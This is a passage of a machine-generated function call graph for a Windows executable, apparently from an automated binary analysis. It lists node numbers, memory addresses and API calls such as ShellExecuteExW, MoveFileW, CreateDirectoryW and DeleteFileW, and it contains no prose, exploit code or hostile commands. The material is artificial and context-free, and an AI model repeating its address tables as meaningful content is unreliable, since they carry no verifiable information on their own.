SetDlgItemTextW 26819->26904 26824 7ff7bb25ef1e 26820->26824 26823 7ff7bb26bb8c 43 API calls 26823->26904 26831 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 26824->26831 26826 7ff7bb25e7f3 26826->26806 26826->26808 26829 7ff7bb2621d0 33 API calls 26826->26829 26838 7ff7bb25e83b BuildCatchObjectHelperInternal 26826->26838 26827->26830 26828 7ff7bb231fa0 31 API calls 26828->26806 26829->26838 26830->26828 26833 7ff7bb25ef24 26831->26833 26832 7ff7bb25aa08 33 API calls 26832->26904 26837 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 26833->26837 26835 7ff7bb25ef6c 27239 7ff7bb232004 33 API calls std::_Xinvalid_argument 26835->27239 26836 7ff7bb25ef78 27241 7ff7bb232004 33 API calls std::_Xinvalid_argument 26836->27241 26841 7ff7bb25ef2a 26837->26841 26845 7ff7bb2320b0 33 API calls 26838->26845 26889 7ff7bb25eb8f 26838->26889 26840 7ff7bb231fa0 31 API calls 26840->26804 26852 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 26841->26852 26842 7ff7bb25ef72 27240 7ff7bb231f80 33 API calls 3 library calls 26842->27240 26844 7ff7bb25ef66 27238 7ff7bb231f80 33 API calls 3 library calls 26844->27238 26853 7ff7bb25e963 26845->26853 26847 7ff7bb238d04 33 API calls 26847->26904 26849 7ff7bb25ed40 26849->26836 26849->26842 26867 7ff7bb25ed3b BuildCatchObjectHelperInternal 26849->26867 26872 7ff7bb2621d0 33 API calls 26849->26872 26851 7ff7bb25ec2a 26851->26835 26851->26844 26861 7ff7bb25ec72 BuildCatchObjectHelperInternal 26851->26861 26851->26867 26869 7ff7bb2621d0 33 API calls 26851->26869 26859 7ff7bb25ef30 26852->26859 26862 7ff7bb25ef60 26853->26862 26868 7ff7bb23129c 33 API calls 26853->26868 26857 7ff7bb2599c8 31 API calls 26857->26904 26858 7ff7bb23e164 33 API calls 26858->26904 26873 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 26859->26873 26860 7ff7bb243d34 51 API calls 26860->26904 27153 7ff7bb25f4e0 26861->27153 27237 7ff7bb23704c 47 API calls BuildCatchObjectHelperInternal 26862->27237 26864 7ff7bb25d5e9 GetDlgItem 26870 7ff7bb232520 SetDlgItemTextW 26864->26870 26865 7ff7bb24dc2c 33 API calls 26865->26904 26867->26840 26874 7ff7bb25e9a6 26868->26874 26869->26861 26875 7ff7bb25d608 IsDlgButtonChecked 26870->26875 26872->26867 26878 7ff7bb25ef36 26873->26878 27227 7ff7bb24d22c 26874->27227 26875->26904 26876 7ff7bb245b60 53 API calls 26876->26904 26877 7ff7bb2432bc 51 API calls 26877->26904 26882 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 26878->26882 26881 7ff7bb25d63c IsDlgButtonChecked 26881->26904 26888 7ff7bb25ef3c 26882->26888 26884 7ff7bb245aa8 33 API calls 26884->26904 26887 7ff7bb243f30 54 API calls 26887->26904 26890 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 26888->26890 26889->26849 26889->26851 26892 7ff7bb25ef5a 26889->26892 26915 7ff7bb25ef54 26889->26915 26894 7ff7bb25ef42 26890->26894 26897 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 26892->26897 26893 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 26893->26892 26900 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 26894->26900 26895 7ff7bb2513c4 CompareStringW 26906 7ff7bb25e9d1 26895->26906 26897->26862 26898 7ff7bb234228 33 API calls 26898->26904 26899 7ff7bb231fa0 31 API calls 26899->26904 26902 7ff7bb25ef48 26900->26902 26901 7ff7bb2432a8 51 API calls 26901->26904 26905 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 26902->26905 26903 7ff7bb245820 33 API calls 26903->26904 26904->26783 26904->26786 26904->26789 26904->26792 26904->26794 26904->26796 26904->26799 26904->26800 26904->26804 26904->26805 26904->26809 26904->26813 26904->26814 26904->26819 26904->26823 26904->26824 26904->26826 26904->26832 26904->26833 26904->26841 26904->26847 26904->26857 26904->26858 26904->26859 26904->26860 26904->26865 26904->26876 26904->26877 26904->26878 26904->26881 26904->26884 26904->26887 26904->26888 26904->26894 26904->26898 26904->26899 26904->26901 26904->26903 26907 7ff7bb23250c SetDlgItemTextW 26904->26907 26911 7ff7bb247df4 47 API calls 26904->26911 26912 7ff7bb231150 33 API calls 26904->26912 26917 7ff7bb232034 33 API calls 26904->26917 26918 7ff7bb232674 31 API calls 26904->26918 26920 7ff7bb23129c 33 API calls 26904->26920 26921 7ff7bb25df99 EndDialog 26904->26921 26924 7ff7bb25db21 MoveFileW 26904->26924 26928 7ff7bb242f58 56 API calls 26904->26928 26929 7ff7bb2320b0 33 API calls 26904->26929 27114 7ff7bb2513c4 CompareStringW 26904->27114 27115 7ff7bb25a440 26904->27115 27191 7ff7bb24cfa4 35 API calls _invalid_parameter_noinfo_noreturn 26904->27191 27192 7ff7bb2595b4 33 API calls Concurrency::cancel_current_task 26904->27192 27193 7ff7bb260684 31 API calls _invalid_parameter_noinfo_noreturn 26904->27193 27194 7ff7bb23df4c 47 API calls BuildCatchObjectHelperInternal 26904->27194 27195 7ff7bb25a834 33 API calls _invalid_parameter_noinfo_noreturn 26904->27195 27196 7ff7bb259518 33 API calls 26904->27196 27197 7ff7bb25abe8 33 API calls 3 library calls 26904->27197 27198 7ff7bb247368 33 API calls 2 library calls 26904->27198 27199 7ff7bb244088 33 API calls 26904->27199 27200 7ff7bb2465b0 33 API calls 3 library calls 26904->27200 27201 7ff7bb2472cc 26904->27201 27205 7ff7bb231744 33 API calls 4 library calls 26904->27205 27206 7ff7bb2431bc 26904->27206 27220 7ff7bb243ea0 FindClose 26904->27220 27221 7ff7bb2513f4 CompareStringW 26904->27221 27222 7ff7bb259cd0 47 API calls 26904->27222 27223 7ff7bb2587d8 51 API calls 3 library calls 26904->27223 27224 7ff7bb25ab54 33 API calls _handle_error 26904->27224 27225 7ff7bb245b08 CompareStringW 26904->27225 27226 7ff7bb247eb0 47 API calls 26904->27226 26908 7ff7bb25ef4e 26905->26908 26906->26889 26906->26895 26906->26902 26906->26908 26909 7ff7bb23129c 33 API calls 26906->26909 26916 7ff7bb231fa0 31 API calls 26906->26916 26923 7ff7bb24d22c 33 API calls 26906->26923 26907->26904 26913 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 26908->26913 26909->26906 26911->26904 26912->26904 26913->26915 26915->26893 26916->26906 26917->26904 26918->26904 26920->26904 26921->26904 26923->26906 26925 7ff7bb25db55 MoveFileExW 26924->26925 26926 7ff7bb25db70 26924->26926 26925->26926 26926->26904 26927 7ff7bb231fa0 31 API calls 26926->26927 26927->26926 26928->26904 26929->26904 26932 7ff7bb25f9a3 26931->26932 26933 7ff7bb2320b0 33 API calls 26932->26933 26935 7ff7bb25f9b9 26933->26935 26934 7ff7bb25f9ee 27254 7ff7bb23e34c 26934->27254 26935->26934 26936 7ff7bb2320b0 33 API calls 26935->26936 26936->26934 26938 7ff7bb25fa4b 27274 7ff7bb23e7a8 26938->27274 26942 7ff7bb25fa61 26943 7ff7bb262320 _handle_error 8 API calls 26942->26943 26944 7ff7bb25bc52 26943->26944 26944->26585 26947 7ff7bb25849c 4 API calls 26946->26947 26948 7ff7bb25f3bf 26947->26948 26949 7ff7bb25f4b7 26948->26949 26950 7ff7bb25f3c7 GetWindow 26948->26950 26951 7ff7bb262320 _handle_error 8 API calls 26949->26951 26955 7ff7bb25f3e2 26950->26955 26952 7ff7bb25be9b 26951->26952 26952->26348 26952->26349 26953 7ff7bb25f3ee GetClassNameW 28298 7ff7bb2513c4 CompareStringW 26953->28298 26955->26949 26955->26953 26956 7ff7bb25f417 GetWindowLongPtrW 26955->26956 26957 7ff7bb25f496 GetWindow 26955->26957 26956->26957 26958 7ff7bb25f429 IsDlgButtonChecked 26956->26958 26957->26949 26957->26955 26958->26957 26959 7ff7bb25f445 GetObjectW 26958->26959 28299 7ff7bb258504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26959->28299 26961 7ff7bb25f461 26962 7ff7bb2584cc 4 API calls 26961->26962 28300 7ff7bb258df4 16 API calls _handle_error 26961->28300 26962->26961 26964 7ff7bb25f479 IsDlgButtonChecked DeleteObject 26964->26957 26966 7ff7bb23252a SetDlgItemTextW 26965->26966 26967 7ff7bb232527 26965->26967 26967->26966 26968->26372 26970 7ff7bb232516 SetDlgItemTextW 26969->26970 26971 7ff7bb232513 26969->26971 26971->26970 26972->26442 26974 7ff7bb2432bc 51 API calls 26973->26974 26975 7ff7bb2432b1 26974->26975 26975->26452 26975->26469 26976->26452 26977->26524 26978->26557 26979->26569 26980->26580 26981->26587 26982->26596 26984 7ff7bb263620 26983->26984 26984->26599 26985->26512 26987 7ff7bb231177 26986->26987 26988 7ff7bb232034 33 API calls 26987->26988 26989 7ff7bb231185 BuildCatchObjectHelperInternal 26988->26989 26989->26527 26990->26550 26991->26622 26992->26644 26993->26659 26994->26671 26996 7ff7bb243e28 swprintf 46 API calls 26995->26996 26997 7ff7bb24a509 26996->26997 26998 7ff7bb250f68 WideCharToMultiByte 26997->26998 27000 7ff7bb24a519 26998->27000 26999 7ff7bb24a589 27020 7ff7bb249408 26999->27020 27000->26999 27015 7ff7bb249800 31 API calls 27000->27015 27018 7ff7bb24a56a SetDlgItemTextW 27000->27018 27003 7ff7bb24a603 27005 7ff7bb24a60c GetWindowLongPtrW 27003->27005 27006 7ff7bb24a6c2 27003->27006 27004 7ff7bb24a6f2 GetSystemMetrics GetWindow 27007 7ff7bb24a71d 27004->27007 27008 7ff7bb24a821 27004->27008 27010 7ff7bb29e2c0 27005->27010 27035 7ff7bb2495a8 27006->27035 27007->27008 27017 7ff7bb24a73e GetWindowRect 27007->27017 27019 7ff7bb24a800 GetWindow 27007->27019 27009 7ff7bb262320 _handle_error 8 API calls 27008->27009 27012 7ff7bb24a830 27009->27012 27013 7ff7bb24a6aa GetWindowRect 27010->27013 27012->26684 27013->27006 27015->27000 27016 7ff7bb24a6e5 SetDlgItemTextW 27016->27004 27017->27007 27018->27000 27019->27007 27019->27008 27021 7ff7bb2495a8 47 API calls 27020->27021 27025 7ff7bb24944f 27021->27025 27022 7ff7bb24955a 27023 7ff7bb262320 _handle_error 8 API calls 27022->27023 27024 7ff7bb24958e GetWindowRect GetClientRect 27023->27024 27024->27003 27024->27004 27025->27022 27026 7ff7bb23129c 33 API calls 27025->27026 27027 7ff7bb24949c 27026->27027 27028 7ff7bb23129c 33 API calls 27027->27028 27034 7ff7bb2495a1 27027->27034 27031 7ff7bb249514 27028->27031 27029 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 27030 7ff7bb2495a7 27029->27030 27031->27022 27032 7ff7bb24959c 27031->27032 27033 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 27032->27033 27033->27034 27034->27029 27036 7ff7bb243e28 swprintf 46 API calls 27035->27036 27037 7ff7bb2495eb 27036->27037 27038 7ff7bb250f68 WideCharToMultiByte 27037->27038 27039 7ff7bb249603 27038->27039 27040 7ff7bb249800 31 API calls 27039->27040 27041 7ff7bb24961b 27040->27041 27042 7ff7bb262320 _handle_error 8 API calls 27041->27042 27043 7ff7bb24962b 27042->27043 27043->27004 27043->27016 27045 7ff7bb2313a4 33 API calls 27044->27045 27046 7ff7bb232462 GetWindowTextW 27045->27046 27047 7ff7bb232494 27046->27047 27048 7ff7bb23129c 33 API calls 27047->27048 27049 7ff7bb2324a2 27048->27049 27050 7ff7bb2324dd 27049->27050 27052 7ff7bb232505 27049->27052 27051 7ff7bb262320 _handle_error 8 API calls 27050->27051 27053 7ff7bb2324f3 27051->27053 27054 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 27052->27054 27053->26693 27055 7ff7bb23250a 27054->27055 27056->26710 27058->26718 27060 7ff7bb25ae3c GetMessageW 27059->27060 27061 7ff7bb25ae80 GetDlgItem 27059->27061 27062 7ff7bb25ae5b IsDialogMessageW 27060->27062 27063 7ff7bb25ae6a TranslateMessage DispatchMessageW 27060->27063 27061->26729 27061->26730 27062->27061 27062->27063 27063->27061 27066 7ff7bb2436b3 27064->27066 27065 7ff7bb2436e0 27068 7ff7bb2432bc 51 API calls 27065->27068 27066->27065 27067 7ff7bb2436cc CreateDirectoryW 27066->27067 27067->27065 27069 7ff7bb24377d 27067->27069 27070 7ff7bb2436ee 27068->27070 27074 7ff7bb24378d 27069->27074 27084 7ff7bb243d34 27069->27084 27071 7ff7bb243791 GetLastError 27070->27071 27072 7ff7bb246a0c 49 API calls 27070->27072 27071->27074 27075 7ff7bb24371c 27072->27075 27076 7ff7bb262320 _handle_error 8 API calls 27074->27076 27077 7ff7bb24373b 27075->27077 27078 7ff7bb243720 CreateDirectoryW 27075->27078 27079 7ff7bb2437b9 27076->27079 27080 7ff7bb243774 27077->27080 27081 7ff7bb2437ce 27077->27081 27078->27077 27079->26748 27080->27069 27080->27071 27082 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 27081->27082 27083 7ff7bb2437d3 27082->27083 27085 7ff7bb243d5e SetFileAttributesW 27084->27085 27086 7ff7bb243d5b 27084->27086 27087 7ff7bb243d74 27085->27087 27095 7ff7bb243df5 27085->27095 27086->27085 27088 7ff7bb246a0c 49 API calls 27087->27088 27090 7ff7bb243d99 27088->27090 27089 7ff7bb262320 _handle_error 8 API calls 27091 7ff7bb243e0a 27089->27091 27092 7ff7bb243d9d SetFileAttributesW 27090->27092 27093 7ff7bb243dbc 27090->27093 27091->27074 27092->27093 27094 7ff7bb243e1a 27093->27094 27093->27095 27096 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 27094->27096 27095->27089 27097 7ff7bb243e1f 27096->27097 27099 7ff7bb23713b 27098->27099 27100 7ff7bb237206 27098->27100 27104 7ff7bb23714b BuildCatchObjectHelperInternal 27099->27104 27107 7ff7bb233f48 33 API calls 2 library calls 27099->27107 27108 7ff7bb23704c 47 API calls BuildCatchObjectHelperInternal 27100->27108 27103 7ff7bb23720b 27105 7ff7bb237273 27103->27105 27109 7ff7bb23889c 8 API calls BuildCatchObjectHelperInternal 27103->27109 27104->26764 27105->26764 27107->27104 27108->27103 27109->27103 27111 7ff7bb25aa2f 27110->27111 27112 7ff7bb25aa36 27110->27112 27111->26904 27112->27111 27242 7ff7bb231744 33 API calls 4 library calls 27112->27242 27114->26904 27116 7ff7bb25a47f 27115->27116 27135 7ff7bb25a706 27115->27135 27243 7ff7bb25cdf8 33 API calls 27116->27243 27118 7ff7bb262320 _handle_error 8 API calls 27120 7ff7bb25a717 27118->27120 27119 7ff7bb25a49e 27121 7ff7bb23129c 33 API calls 27119->27121 27120->26864 27122 7ff7bb25a4de 27121->27122 27123 7ff7bb23129c 33 API calls 27122->27123 27124 7ff7bb25a517 27123->27124 27125 7ff7bb23129c 33 API calls 27124->27125 27126 7ff7bb25a54a 27125->27126 27244 7ff7bb25a834 33 API calls _invalid_parameter_noinfo_noreturn 27126->27244 27128 7ff7bb25a573 27131 7ff7bb25a740 27128->27131 27132 7ff7bb25a73a 27128->27132 27134 7ff7bb2320b0 33 API calls 27128->27134 27136 7ff7bb25a685 27128->27136 27143 7ff7bb25a734 27128->27143 27129 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 27129->27132 27130 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 27130->27131 27133 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 27131->27133 27132->27130 27137 7ff7bb25a746 27133->27137 27134->27136 27135->27118 27136->27135 27136->27137 27138 7ff7bb25a72f 27136->27138 27139 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 27137->27139 27141 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 27138->27141 27140 7ff7bb25a74c 27139->27140 27142 7ff7bb23255c 61 API calls 27140->27142 27141->27143 27144 7ff7bb25a795 27142->27144 27143->27129 27145 7ff7bb25a7b1 27144->27145 27146 7ff7bb25a801 SetDlgItemTextW 27144->27146 27150 7ff7bb25a7a1 27144->27150 27147 7ff7bb262320 _handle_error 8 API calls 27145->27147 27146->27145 27148 7ff7bb25a827 27147->27148 27148->26864 27149 7ff7bb25a7ad 27149->27145 27151 7ff7bb25a7b7 EndDialog 27149->27151 27150->27145 27150->27149 27245 7ff7bb24bb00 102 API calls 27150->27245 27151->27145 27160 7ff7bb25f529 __scrt_get_show_window_mode 27153->27160 27168 7ff7bb25f87d 27153->27168 27154 7ff7bb231fa0 31 API calls 27155 7ff7bb25f89c 27154->27155 27156 7ff7bb262320 _handle_error 8 API calls 27155->27156 27157 7ff7bb25f8a8 27156->27157 27157->26867 27158 7ff7bb25f684 27161 7ff7bb23129c 33 API calls 27158->27161 27160->27158 27246 7ff7bb2513c4 CompareStringW 27160->27246 27162 7ff7bb25f6c0 27161->27162 27163 7ff7bb2432a8 51 API calls 27162->27163 27164 7ff7bb25f6ca 27163->27164 27165 7ff7bb231fa0 31 API calls 27164->27165 27167 7ff7bb25f6d5 27165->27167 27166 7ff7bb25f742 ShellExecuteExW 27169 7ff7bb25f755 27166->27169 27171 7ff7bb25f846 27166->27171 27167->27166 27170 7ff7bb23129c 33 API calls 27167->27170 27168->27154 27172 7ff7bb25f78e 27169->27172 27175 7ff7bb25f7e3 CloseHandle 27169->27175 27180 7ff7bb25f781 ShowWindow 27169->27180 27173 7ff7bb25f717 27170->27173 27171->27168 27174 7ff7bb25f8fb 27171->27174 27248 7ff7bb25fe24 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 27172->27248 27247 7ff7bb245b60 53 API calls 2 library calls 27173->27247 27177 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 27174->27177 27178 7ff7bb25f801 27175->27178 27179 7ff7bb25f7f2 27175->27179 27183 7ff7bb25f900 27177->27183 27178->27171 27187 7ff7bb25f837 ShowWindow 27178->27187 27249 7ff7bb2513c4 CompareStringW 27179->27249 27180->27172 27182 7ff7bb25f725 27186 7ff7bb231fa0 31 API calls 27182->27186 27185 7ff7bb25f7a6 27185->27175 27189 7ff7bb25f7b4 GetExitCodeProcess 27185->27189 27188 7ff7bb25f72f 27186->27188 27187->27171 27188->27166 27189->27175 27190 7ff7bb25f7c7 27189->27190 27190->27175 27191->26904 27192->26904 27193->26904 27194->26904 27195->26904 27196->26904 27197->26904 27198->26904 27199->26904 27200->26904 27202 7ff7bb2472ea 27201->27202 27250 7ff7bb23b3a8 27202->27250 27205->26904 27207 7ff7bb2431e7 DeleteFileW 27206->27207 27208 7ff7bb2431e4 27206->27208 27209 7ff7bb2431fd 27207->27209 27217 7ff7bb24327c 27207->27217 27208->27207 27211 7ff7bb246a0c 49 API calls 27209->27211 27210 7ff7bb262320 _handle_error 8 API calls 27212 7ff7bb243291 27210->27212 27213 7ff7bb243222 27211->27213 27212->26904 27214 7ff7bb243226 DeleteFileW 27213->27214 27215 7ff7bb243243 27213->27215 27214->27215 27216 7ff7bb2432a1 27215->27216 27215->27217 27218 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 27216->27218 27217->27210 27219 7ff7bb2432a6 27218->27219 27221->26904 27222->26904 27223->26904 27224->26904 27225->26904 27226->26904 27230 7ff7bb24d25e 27227->27230 27228 7ff7bb24d292 27228->26906 27229 7ff7bb231744 33 API calls 27229->27230 27230->27228 27230->27229 27231->26818 27232->26808 27234->26789 27235->26792 27236->26794 27237->26844 27238->26835 27240->26836 27242->27112 27243->27119 27244->27128 27245->27149 27246->27158 27247->27182 27248->27185 27249->27178 27251 7ff7bb23b3f2 __scrt_get_show_window_mode 27250->27251 27252 7ff7bb262320 _handle_error 8 API calls 27251->27252 27253 7ff7bb23b4b6 27252->27253 27253->26904 27310 7ff7bb2486ec 27254->27310 27256 7ff7bb23e3c4 27316 7ff7bb23e600 27256->27316 27258 7ff7bb23e4d4 27260 7ff7bb2621d0 33 API calls 27258->27260 27259 7ff7bb23e454 27259->27258 27261 7ff7bb23e549 27259->27261 27262 7ff7bb23e4f0 27260->27262 27263 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 27261->27263 27322 7ff7bb253148 102 API calls 27262->27322 27271 7ff7bb23e54e 27263->27271 27265 7ff7bb23e51d 27266 7ff7bb262320 _handle_error 8 API calls 27265->27266 27268 7ff7bb23e52d 27266->27268 27267 7ff7bb2418c2 27270 7ff7bb24190d 27267->27270 27272 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 27267->27272 27268->26938 27269 7ff7bb231fa0 31 API calls 27269->27271 27270->26938 27271->27267 27271->27269 27271->27270 27273 7ff7bb24193b 27272->27273 27275 7ff7bb23e7ea 27274->27275 27276 7ff7bb23e864 27275->27276 27277 7ff7bb23e8a1 27275->27277 27323 7ff7bb243ec8 27275->27323 27276->27277 27279 7ff7bb23e993 27276->27279 27286 7ff7bb23e900 27277->27286 27330 7ff7bb23f578 27277->27330 27280 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 27279->27280 27282 7ff7bb23e998 27280->27282 27281 7ff7bb23e955 27284 7ff7bb262320 _handle_error 8 API calls 27281->27284 27285 7ff7bb23e97e 27284->27285 27288 7ff7bb23e578 27285->27288 27286->27281 27366 7ff7bb2328a4 82 API calls 2 library calls 27286->27366 28284 7ff7bb2415d8 27288->28284 27291 7ff7bb23e59e 27292 7ff7bb231fa0 31 API calls 27291->27292 27294 7ff7bb23e5b7 27292->27294 27293 7ff7bb251870 108 API calls 27293->27291 27295 7ff7bb231fa0 31 API calls 27294->27295 27296 7ff7bb23e5c3 27295->27296 27297 7ff7bb231fa0 31 API calls 27296->27297 27298 7ff7bb23e5cf 27297->27298 27299 7ff7bb24878c 108 API calls 27298->27299 27300 7ff7bb23e5db 27299->27300 27301 7ff7bb231fa0 31 API calls 27300->27301 27302 7ff7bb23e5e4 27301->27302 27303 7ff7bb231fa0 31 API calls 27302->27303 27306 7ff7bb23e5ed 27303->27306 27304 7ff7bb2418c2 27305 7ff7bb24190d 27304->27305 27307 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 27304->27307 27305->26942 27306->27304 27306->27305 27308 7ff7bb231fa0 31 API calls 27306->27308 27309 7ff7bb24193b 27307->27309 27308->27306 27311 7ff7bb24870a 27310->27311 27312 7ff7bb2621d0 33 API calls 27311->27312 27314 7ff7bb24872f 27312->27314 27313 7ff7bb2621d0 33 API calls 27315 7ff7bb248759 27313->27315 27314->27313 27315->27256 27317 7ff7bb23e627 27316->27317 27318 7ff7bb23e62c BuildCatchObjectHelperInternal 27316->27318 27319 7ff7bb231fa0 31 API calls 27317->27319 27320 7ff7bb23e668 BuildCatchObjectHelperInternal 27318->27320 27321 7ff7bb231fa0 31 API calls 27318->27321 27319->27318 27320->27259 27321->27320 27322->27265 27324 7ff7bb2472cc 8 API calls 27323->27324 27325 7ff7bb243ee1 27324->27325 27326 7ff7bb243f0f 27325->27326 27367 7ff7bb2440bc 27325->27367 27326->27275 27329 7ff7bb243efa FindClose 27329->27326 27331 7ff7bb23f598 _snwprintf 27330->27331 27393 7ff7bb232950 27331->27393 27334 7ff7bb23f5cc 27338 7ff7bb23f5fc 27334->27338 27408 7ff7bb2333e4 27334->27408 27337 7ff7bb23f5f8 27337->27338 27440 7ff7bb233ad8 27337->27440 27643 7ff7bb232c54 27338->27643 27345 7ff7bb23f7cb 27450 7ff7bb23f8a4 27345->27450 27346 7ff7bb238d04 33 API calls 27348 7ff7bb23f662 27346->27348 27663 7ff7bb247918 48 API calls 2 library calls 27348->27663 27350 7ff7bb23f677 27351 7ff7bb243ec8 55 API calls 27350->27351 27359 7ff7bb23f6ad 27351->27359 27353 7ff7bb23f842 27353->27338 27455 7ff7bb2369f8 27353->27455 27466 7ff7bb23f930 27353->27466 27358 7ff7bb23f74d 27358->27345 27362 7ff7bb23f895 27358->27362 27365 7ff7bb23f89a 27358->27365 27359->27358 27360 7ff7bb243ec8 55 API calls 27359->27360 27359->27365 27664 7ff7bb247918 48 API calls 2 library calls 27359->27664 27360->27359 27361 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 27364 7ff7bb23f8a0 27361->27364 27363 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 27362->27363 27363->27365 27365->27361 27366->27281 27368 7ff7bb2440f9 FindFirstFileW 27367->27368 27369 7ff7bb2441d2 FindNextFileW 27367->27369 27372 7ff7bb2441f3 27368->27372 27373 7ff7bb24411e 27368->27373 27371 7ff7bb2441e1 GetLastError 27369->27371 27369->27372 27386 7ff7bb2441c0 27371->27386 27374 7ff7bb244211 27372->27374 27376 7ff7bb2320b0 33 API calls 27372->27376 27375 7ff7bb246a0c 49 API calls 27373->27375 27381 7ff7bb23129c 33 API calls 27374->27381 27378 7ff7bb244144 27375->27378 27376->27374 27377 7ff7bb262320 _handle_error 8 API calls 27382 7ff7bb243ef4 27377->27382 27379 7ff7bb244148 FindFirstFileW 27378->27379 27380 7ff7bb244167 27378->27380 27379->27380 27380->27372 27384 7ff7bb2441af GetLastError 27380->27384 27392 7ff7bb244314 27380->27392 27383 7ff7bb24423b 27381->27383 27382->27326 27382->27329 27385 7ff7bb248090 47 API calls 27383->27385 27384->27386 27387 7ff7bb244249 27385->27387 27386->27377 27387->27386 27390 7ff7bb24430f 27387->27390 27388 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 27389 7ff7bb24431a 27388->27389 27391 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 27390->27391 27391->27392 27392->27388 27394 7ff7bb23296c 27393->27394 27395 7ff7bb2486ec 33 API calls 27394->27395 27396 7ff7bb23298d 27395->27396 27397 7ff7bb2621d0 33 API calls 27396->27397 27398 7ff7bb232ac2 27396->27398 27399 7ff7bb232ab0 27397->27399 27666 7ff7bb244d04 27398->27666 27399->27398 27402 7ff7bb2391c8 35 API calls 27399->27402 27402->27398 27403 7ff7bb242ca8 27407 7ff7bb2424c0 54 API calls 27403->27407 27404 7ff7bb242cc1 27405 7ff7bb242cc5 27404->27405 27680 7ff7bb23b7e8 99 API calls 2 library calls 27404->27680 27405->27334 27407->27404 27439 7ff7bb2428d0 104 API calls 27408->27439 27409 7ff7bb233674 27681 7ff7bb2328a4 82 API calls 2 library calls 27409->27681 27410 7ff7bb233431 __scrt_get_show_window_mode 27418 7ff7bb23344e 27410->27418 27421 7ff7bb233601 27410->27421 27436 7ff7bb242bb0 101 API calls 27410->27436 27412 7ff7bb2369f8 141 API calls 27414 7ff7bb233682 27412->27414 27413 7ff7bb2334cc 27431 7ff7bb2428d0 104 API calls 27413->27431 27414->27412 27415 7ff7bb23370c 27414->27415 27414->27421 27434 7ff7bb242aa0 101 API calls 27414->27434 27420 7ff7bb233740 27415->27420 27415->27421 27682 7ff7bb2328a4 82 API calls 2 library calls 27415->27682 27417 7ff7bb2335cb 27417->27418 27419 7ff7bb2335d7 27417->27419 27418->27409 27418->27414 27419->27421 27423 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 27419->27423 27420->27421 27422 7ff7bb23384d 27420->27422 27432 7ff7bb242bb0 101 API calls 27420->27432 27421->27337 27422->27421 27425 7ff7bb2320b0 33 API calls 27422->27425 27426 7ff7bb233891 27423->27426 27424 7ff7bb2334eb 27424->27417 27437 7ff7bb242aa0 101 API calls 27424->27437 27425->27421 27426->27337 27427 7ff7bb2335a7 27427->27417 27433 7ff7bb2428d0 104 API calls 27427->27433 27428 7ff7bb2369f8 141 API calls 27429 7ff7bb23378e 27428->27429 27429->27428 27430 7ff7bb233803 27429->27430 27435 7ff7bb242aa0 101 API calls 27429->27435 27438 7ff7bb242aa0 101 API calls 27430->27438 27431->27424 27432->27429 27433->27417 27434->27414 27435->27429 27436->27413 27437->27427 27438->27422 27439->27410 27441 7ff7bb233af9 27440->27441 27446 7ff7bb233b55 27440->27446 27683 7ff7bb233378 27441->27683 27442 7ff7bb262320 _handle_error 8 API calls 27444 7ff7bb233b67 27442->27444 27444->27345 27444->27346 27446->27442 27447 7ff7bb233b6c 27448 7ff7bb267904 _invalid_parameter_noinfo_noreturn 31 API calls 27447->27448 27449 7ff7bb233b71 27448->27449 27901 7ff7bb24886c 27450->27901 27452 7ff7bb23f8ba 27905 7ff7bb24ef60 GetSystemTime SystemTimeToFileTime 27452->27905 27456 7ff7bb236a0e 27455->27456 27461 7ff7bb236a0a 27455->27461 27465 7ff7bb242bb0 101 API calls 27456->27465 27457 7ff7bb236a1b 27458 7ff7bb236a3e 27457->27458 27459 7ff7bb236a2f 27457->27459 27997 7ff7bb235130 130 API calls 2 library calls 27458->27997 27459->27461 27914 7ff7bb235e24 27459->27914 27461->27353 27463 7ff7bb236a3c 27463->27461 27998 7ff7bb23466c 82 API calls 27463->27998 27465->27457 27467 7ff7bb23f978 27466->27467 27471 7ff7bb23f9b0 27467->27471 27526 7ff7bb23fa34 27467->27526 28114 7ff7bb25612c 146 API calls 3 library calls 27467->28114 27469 7ff7bb241189 27472 7ff7bb24118e 27469->27472 27473 7ff7bb2411e1 27469->27473 27470 7ff7bb262320 _handle_error 8 API calls 27474 7ff7bb2411c4 27470->27474 27471->27469 27477 7ff7bb23f9d0 27471->27477 27471->27526 27472->27526 28163 7ff7bb23dd08 179 API calls 27472->28163 27473->27526 28164 7ff7bb25612c 146 API calls 3 library calls 27473->28164 27474->27353 27477->27526 28035 7ff7bb239bb0 27477->28035 27479 7ff7bb23fad6 28048 7ff7bb245ef8 27479->28048 27482 7ff7bb23fb7a 27642 7ff7bb242aa0 101 API calls 